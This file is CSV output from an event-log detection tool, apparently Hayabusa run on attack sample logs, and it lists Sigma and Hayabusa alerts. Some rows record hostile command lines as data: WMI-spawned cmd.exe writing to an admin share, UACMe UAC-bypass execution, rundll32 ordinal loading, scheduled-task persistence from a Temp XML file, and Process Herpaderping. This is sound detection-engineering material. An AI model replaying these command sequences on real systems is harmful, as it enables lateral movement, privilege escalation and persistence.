2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
